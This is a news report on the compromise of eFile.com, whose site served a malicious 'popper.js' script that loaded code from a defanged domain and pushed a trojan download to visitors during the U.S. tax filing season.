Efile.com, a provider of IRS-authorized e-file software for tax returns, has been found to be serving JavaScript malware on its website. The malicious script, called ‘popper.js,’ was discovered by security researchers and appeared to have been present on the site for weeks before being removed.
The code was designed to load JavaScript from the domain ‘infoamanewonliag[.]online,’ which was also found to be associated with an additional file, ‘update.js,’ that attempted to prompt users to download a trojan depending on their browser. The same IP address, which was located in Tokyo and hosted with Alibaba, was found to host both domains.
The incident came to light after users of eFile.com raised concerns that the site had been “hijacked.”
Upon investigation, security researchers found that the site had been compromised since at least the middle of March. The full extent of the attack is not yet known, and it remains unclear whether any visitors or customers of eFile.com were infected with the malware. At the time of writing, eFile.com had not responded to requests for comment.
The incident is particularly concerning given the timing, with U.S. taxpayers currently filing their tax returns ahead of the April 18th deadline.
The use of Math.random() in the code suggests that the threat actor intended to prevent caching and load a fresh copy of the malware each time eFile.com was visited, should any changes be made to the code. The malicious script, ‘popper.js,’ was found to be loaded on almost every page of eFile.com, at least up until April 1st.
Security researchers have criticized eFile.com for leaving the malicious code on its website for weeks, with one group calling out the company for not taking action despite the incident being reported on Reddit 15 days earlier.
The incident raises concerns about the security of e-file software providers and the potential impact on users’ personal and financial information.
